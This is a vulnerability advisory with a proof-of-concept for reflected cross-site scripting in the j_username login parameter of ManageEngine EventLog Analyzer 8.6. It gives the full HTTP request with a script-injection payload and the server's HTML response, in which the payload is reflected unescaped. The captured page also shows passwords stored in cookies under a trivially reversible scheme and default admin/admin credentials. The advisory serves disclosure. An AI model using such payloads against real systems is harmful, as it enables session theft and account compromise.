================================================================================================================================================================
ManageEngine EventLog Analyzer 8.6 cross-site scripting (XSS) Vulnerability
================================================================================================================================================================
#Date- 12/12/2013
# code by Asheesh kumar Mani Tripathi
# Credit by Asheesh Anaconda
#Vulnerbility
ManageEngine EventLog Analyzer 8.6 is prone to an cross-site scripting (XSS) Vulnerability because the application fails to properly
sanitize user-supplied input
#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities
========================================================================================================================
Request
========================================================================================================================
GET /event/j_security_check?forChecking=null&j_username=aad307"><script>alert(1)</script>509283f38eba1c193&j_password=a&domains=Choose&loginButton=Login&optionValue=hide HTTP/1.1
Host: 172.28.154.78:8400
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://172.28.154.78:8400/event/index3.do
Cookie: panelState=expanded; calselection=custom; tooltipDiv=block; JSESSIONID=946D162CF15C188883BA1750E38F7A7B
Connection: keep-alive
========================================================================================================================
Response
========================================================================================================================
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
isLoginPage: true
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 17 Dec 2013 19:36:08 GMT
Content-Length: 17880
<link href="styles/newTheme.css" rel="stylesheet" type="text/css" />
<!-- link href="styles/calendar.css" rel="stylesheet" type="text/css"-->
<script type="text/javascript" language="JavaScript" src="javascript/sacommon.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jquery-1.3.2.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jquery-utils.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jquery.cookie.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jquery-ui.js" ></script>
<script type="text/javascript" language="JavaScript" src="javascript/elascript.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/setLayerPosition.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/LAUtils.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/json2.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jstorage.js"></script>
<!DOCTYPE html>
<html>
<head>
<title>ManageEngine EventLog Analyzer 8</title>
<LINK REL="SHORTCUT ICON" HREF="images/favicon.ico">
<script>
function userType(ADAuthEnabled)
{
if(ADAuthEnabled == 'true')
{
//document.getElementById('loginOption').style.display='';
document.getElementById('domainLists').style.visibility="visible";
document.getElementById('selectdomiain').style.visibility="visible";
} else {
document.loginForm.domain.disabled=true;
}
//loadLogin();
var id = document.getElementById("loginFirst");
eval("id.style.visibility = 'visible';");
}
var xmlHttp;
function clearLoginInfo()
{
xmlHttp=GetXmlHttpObject()
if (xmlHttp==null)
{
alert ("Browser does not support HTTP Request")
return
}
var url="login.do?requestid=false"//No I18N
url=url+"&sid="+Math.random()//No I18N
xmlHttp.onreadystatechange=processReqChange
xmlHttp.open("GET",url,true)
xmlHttp.send(null)
}
function processReqChange()
{
// only if xmlHttp shows "complete"
if (xmlHttp.readyState == 4)
{
// only if "OK"
if (xmlHttp.status == 200)
{
var value = xmlHttp.responseText;
var id = document.getElementById("loginFirst");
eval("id.style.visibility = 'hidden';");
}
else
{
alert("There was a problem retrieving the data:\n" + xmlHttp.statusText);//No I18N
}
}
}
function dynamicprocessReqChange()
{
// only if xmlHttp shows "complete"
if (xmlHttp.readyState == 4)
{
// only if "OK"
if (xmlHttp.status == 200)
{
var value = xmlHttp.responseText;
if(value != null){
populatedomains(value);
}
}
else
{
alert("There was a problem retrieving the data:\n" + xmlHttp.statusText);//No I18N
}
}
}
function populatedomains(domainslist)
{
var domainsforthisuser = domainslist.split(",");
var numberofdomains = domainsforthisuser.length;
document.loginForm.domains.options.length = 0;
for(var i=0;i<numberofdomains;i++)
{
document.forms["loginForm"].domains.options[i] =new Option(domainsforthisuser[i],domainsforthisuser[i]);
}
authenticationType();
}
function GetXmlHttpObject()
{
var objXMLHttp=null
if (window.XMLHttpRequest) //For browser compatibility - Mozilla,FF
{
objXMLHttp=new XMLHttpRequest()
}
else if (window.ActiveXObject) //For browser compatibility - IE
{
objXMLHttp=new ActiveXObject("Microsoft.XMLHTTP")
}
return objXMLHttp
}
function dynamicDomains(usernameObject )
{
var username = usernameObject.value;
xmlHttp=GetXmlHttpObject()
if (xmlHttp==null)
{
alert ("Browser does not support HTTP Request")
return
}
var url="/domainAuth?username="+username//No I18N
xmlHttp.onreadystatechange=dynamicprocessReqChange
xmlHttp.open("GET",url,true)
xmlHttp.send(null);
}
function loadLogin()
{
//alert("loadLogin()")
document.loginForm.j_username.value="";
//document.login.j_username.focus();
init = (document.cookie).indexOf("username");
if(init != -1 )
{
//alert("inside getCookie.init");
userlen = "username".length; //No I18N
beginIndex = ((document.cookie).indexOf("username")+userlen);
endIndex = (document.cookie).indexOf(";",beginIndex);
if(endIndex == -1)
{
endIndex = (document.cookie).length;
}
username=(document.cookie).substring(beginIndex+1,endIndex);
//alert("user:"+username);
startIndex = ((document.cookie).indexOf("password")+"password".length);//No I18N
endInd = (document.cookie).indexOf(";",startIndex);
if(endInd == -1)
{
endInd=(document.cookie).length;
}
//Decrypting encrypted password..
var encPassword=(document.cookie).substring(startIndex+1,endInd);
password = decryptPassword(encPassword);
//alert(password);
var ssoStart = ((document.cookie).indexOf("singlesignon")+"singlesignon".length);//No I18N
var ssoEnd = (document.cookie).indexOf(";",ssoStart);
if(ssoEnd == -1)
{
ssoEnd=(document.cookie).length;
}
var singlesignon = (document.cookie).substring(ssoStart+1,ssoEnd);
//alert(singlesignon);
document.loginForm.j_username.value=username;
document.loginForm.j_password.value=password;
document.loginForm.checkbox.checked=false;
//alert(username + password+singlesignon);
if(singlesignon=="true" && username!="" && password!="")
{
//alert('1');
document.loginForm.checkbox.checked=true;
//debugger;
if(document.loginForm.forChecking.value!="Invalid loginName/password")
{
document.loginForm.forChecking.value="";
if ("null" == 'null')
{
document.loginForm.submit();
}
}
else
{
document.loginForm.j_username.value="";
document.loginForm.j_password.value="";
document.loginForm.checkbox.checked=false;
document.loginForm.j_username.focus();
}
}
}
else
{
//alert('0');
document.loginForm.j_username.focus();
}
}
function encryptPassword(textPassword)
{
var num_out = "";
var str_in = escape(textPassword);
for(i = 0; i < str_in.length; i++)
{
num_out += str_in.charCodeAt(i) - 23;
}
return num_out;
}
function decryptPassword(encPassword)
{
var str_out = "";
var num_out = encPassword;
for(i = 0; i < num_out.length; i += 2)
{
num_in = parseInt(num_out.substr(i,[2])) + 23;
num_in = unescape('%' + num_in.toString(16));
str_out += num_in;
}
var textPassword = unescape(str_out);
return textPassword ;
}
function authenticationType()
{
var seldomain = document.loginForm.domains.value;
if(seldomain.trim() == 'Local Authentication' || seldomain.trim() == 'Choose')
{
if(seldomain.trim() == 'Choose' && jQuery('#domainLists').css('visibility') == 'visible'){
document.loginForm.AUTHRULE_NAME.value='ADAuthenticator'; //No I18N
document.loginForm.domainName.disabled=false;
document.loginForm.domainName.value=seldomain;
document.loginForm.domain.disabled=false;
document.loginForm.domain.value=seldomain;
}
else
{
document.loginForm.domain.disabled=true;
document.loginForm.AUTHRULE_NAME.disabled=true; //No I18N
document.loginForm.domainName.disabled=true;
}
}
else if(seldomain=='radius')
{
document.loginForm.AUTHRULE_NAME.value='RadiusAuthenticator'; //No I18N
document.loginForm.domain.disabled=false;
document.loginForm.domain.value=seldomain;
}
else
{
document.loginForm.AUTHRULE_NAME.value='ADAuthenticator'; //No I18N
document.loginForm.domainName.disabled=false;
document.loginForm.domainName.value=seldomain;
document.loginForm.domain.disabled=false;
document.loginForm.domain.value=seldomain;
}
}
function loginOptions()
{
var optionValue = document.loginForm.optionValue.value;
if(optionValue == 'show')
{
document.getElementById('domainLists').style.visibility='visible';
document.getElementById('selectdomiain').style.visibility='visible';
//document.getElementById('loginOption').innerHTML="<a title='Hide' href='javascript:loginOptions()'>Options <<</a>";
document.loginForm.optionValue.value='hide';//No I18N
}
else
{
document.getElementById('domainLists').style.visibility='hidden';
document.getElementById('selectdomiain').style.visibility='hidden';
//document.getElementById('loginOption').innerHTML="<a title='Show' href='javascript:loginOptions()'>Options >></a>";
document.loginForm.optionValue.value='show';//No I18N
}
}
jQuery(document).ready(function() {
var isIE = jQuery.browser.msie;
if(isIE)
{
jQuery('.placeholderUsername').show();
jQuery('.placeholderPassword').show();
jQuery('#username').keypress(function(){
if(jQuery(this).val() == '' || jQuery(this).val() == 'Password')
{
jQuery('.placeholderPassword').hide();
jQuery('.placeholderUsername').hide();
}
});
jQuery('#username').click(function(){
jQuery('.placeholderUsername').hide();
jQuery('.placeholderPassword').hide();
});
jQuery('#username').focus(function(){
jQuery('.placeholderUsername').hide();
});
jQuery('#password').focus(function(){
jQuery('.placeholderPassword').hide();
});
jQuery('.placeholderUsername').click(function(){
jQuery(this).hide();
jQuery('#username').focus();
});
jQuery('.placeholderPassword').click(function(){
jQuery(this).hide();
jQuery('#password').focus();
});
jQuery('#username').blur(function(){
if(jQuery(this).val() == '')
{
jQuery('.placeholderUsername').show();
}
if(jQuery('#password').val() == '')
{
jQuery('.placeholderPassword').show();
}
else
{
jQuery('.placeholderPassword').hide();
}
});
jQuery('#password').blur(function(){
if(jQuery(this).val() == '')
{
jQuery('.placeholderPassword').show();
}
if(jQuery('#username').val() == '')
{
jQuery('.placeholderUsername').show();
}
});
}
});
</script>
</head>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onload="userType('false');" style="background-color:#FFF" scroll="yes" >
<script language="JavaScript" type="text/JavaScript">
function check()
{
x = document.loginForm
if (x.j_username.value == "" || x.j_username.value =="User Name")
{
document.getElementById('message').innerHTML ='Please enter a User Name';
return false;
}
if ( x.j_password.value == "" || x.j_password.value =="Password")
{
document.getElementById('message').innerHTML ='Please enter password';
return false;
}
//Convert the username to lowercase to overcome the login issue in mickey
x.j_username.value=x.j_username.value.toLowerCase();
// this is for 'Keep me signed on'
var expDate = new Date();
var thisCookie;
if(x.checkbox.checked)
{
expDate.setTime(expDate.getTime()+(24*60*60*1000*365));
document.cookie="username= "+x.j_username.value+";expires= "+((expDate).toGMTString());
//Encrypting the password for Cookie
var textPassword = x.j_password.value ;
var encPassword = encryptPassword(textPassword);
document.cookie="password= "+ encPassword +";expires= "+((expDate).toGMTString());
var sso = "true";
document.cookie="singlesignon= "+ sso +";expires= "+((expDate).toGMTString());
//alert("cookie:"+document.cookie);
//console.debug("cockie="+document.cookie);
}
else
{
expDate.setTime(expDate.getTime());
document.cookie="username= "+x.j_username.value+";expires= "+((expDate).toGMTString());
document.cookie="password= "+x.j_password.value+";expires= "+((expDate).toGMTString());
document.cookie="singlesignon= 'false';expires= "+((expDate).toGMTString());
//alert("else cookie:"+document.cookie);
}
}
</script>
<form name="loginForm" action="j_security_check" method="post" onSubmit="return check()" >
<input type="hidden" name="AUTHRULE_NAME" value="Authenticator">
<input type="hidden" name="domainName" disabled value="Local">
<div id="loginmain">
<div id="login">
<div class="loginmessage">
<h1>Sign In here</h1>
<div id="message" class="error2"></div>
<input type="hidden" name="forChecking" value="No such account configured for the user [aad307"><script>alert(1)</script>509283f38eba1c193]">
<SCRIPT LANGUAGE="javascript" type="text/javascript">
document.getElementById('message').innerHTML ='Invalid loginname / password';
</SCRIPT>
</div>
<div class="loginbox">
<div class="login_input1"> <span class="usericon"> </span>
<div class="placeholderUsername">User Name</div>
<input type="text" tabindex="10" name="j_username" id="username" onchange='dynamicDomains(this)' class="txtbox2" placeholder="User Name" />
</div>
<div class="login_input"> <span class="passicon"> </span>
<div class="placeholderPassword">Password</div>
<input type="password" tabindex="20" name="j_password" id="password" class="txtbox2" placeholder="Password" />
</div>
</div>
<div id="selectdomiain" style="visibility:hidden">
<div id="domainLists" style="visibility:hidden">
<select name="domains" onChange='authenticationType()'>
<option value="Choose">-- Choose --</option>
<option value="Local Authentication">Local Authentication</option>
</select>
<input name="domain" type="hidden" value="">
</div></div>
<div class="btn">
<div class="remember">
<input type="checkbox" name="checkbox" id="checkbox" />
<label class="txt">Keep me signed in</label>
</div>
<div class="login_bnt">
<input name="loginButton" type="submit" style="width:80" class="loginbtn" value="Login" onclick="authenticationType()">
<input name="optionValue" type="hidden" value="hide">
</div>
</div>
<div id="loginFirst" class="alignC" style="top:300px; position:absolute;width:400px;">
<span id="firstTimeInfo" class="firstTimeMgs">First time users use '<b>admin</b>' / '<b>admin</b>' to login <a title="Do not show login details again" onclick="clearLoginInfo()" href="javascript:void(0);">X</a> </span>
</div>
</div>
<div id="login_log">
<div id="logobg">
<div id="logo"><img src="images/eventlog_login_logo.png" alt="EventLog Analyzer" /></div>
<div class="loginCaption">Unlock the Real Value of your Machine Generated Logs</div>
</div>
</div>
</div>
<div id="copyright">The <a href="http://www.eventloganalyzer.com" target="_blank">SIEM software</a> from <a href="http://www.manageengine.com" target="_blank" title="www.manageengine.com">ManageEngine </a> © 2013 <a href="http://www.manageengine.com" target="_blank" title="www.manageengine.com">ZOHO Corp.</a> All Rights Reserved </div>
<script>
loadLogin();
</script>
</form>
<map name="Map">
<area shape="rect" coords="2,2,141,37" href="http://www.netflowanalyzer.com" target="_blank" title="http://www.netflowanalyzer.com">
<area shape="rect" coords="149,3,289,38" href="http://www.desktopcentral.com" target="_blank" title="http://www.desktopcentral.com">
<area shape="rect" coords="296,3,437,38" href="http://www.fwanalyzer.com" target="_blank" title="http://www.fwanalyzer.com">
<area shape="rect" coords="442,2,582,36" href="http://www.opmanager.com" target="_blank" title="http://www.opmanager.com">
<area shape="rect" coords="589,2,736,36" href="http://www.wifimanager.com" target="_blank" title="http://www.wifimanager.com">
<area shape="rect" coords="460,42,515,54" href="https://store.manageengine.com" target="_blank" title="https://store.manageengine.com">
</map>
</body>
</html>
<script language="JavaScript">
function getieversion()
{
var ua = window.navigator.userAgent
var msie = ua.indexOf ( "MSIE " )
if ( msie > 0 ) {return parseInt ( ua.substring ( msie+5, ua.indexOf ( ".", msie ) ) );}
else {return 6 ;} //tmp kludge to resolve other browsers
}
</script>
<script>
if(getieversion()<=5 )
{
document.loginForm.j_username.disabled = true;
document.loginForm.j_password.disabled = true;
document.loginForm.loginButton.disabled = true;
document.loginForm.j_username.className = "txtboxDisabled";
document.loginForm.j_password.className = "txtboxDisabled";
document.loginForm.loginButton.className= "txtboxDisabled";
alert("Sorry, we do not Support your Internet Explorer version "+getieversion()+" !!!");//No I18N
}
var AcceptsCookiesCheck = false;
if(eval("document.cookie"))
{
if(document.cookie == '')
{
document.cookie = 'AcceptsCookiesCheck=yes';
if(document.cookie.indexOf('AcceptsCookiesCheck=yes') != -1)
{
AcceptsCookiesCheck = true;
}
else
{
alert("Web Browser should have both Javascript and Cookies enabled!");
}
}
}
jQuery.cookie("panelState","expanded");//No I18N
jQuery.cookie("calselection","custom");//No I18N
jQuery.cookie("tooltipDiv","block");//No I18N
//added for search - Pravin
jQuery(document).ready(function()
{
//this will remove all the keys which were saved by storage ...
jQuery.jStorage.flush();
});
</script>
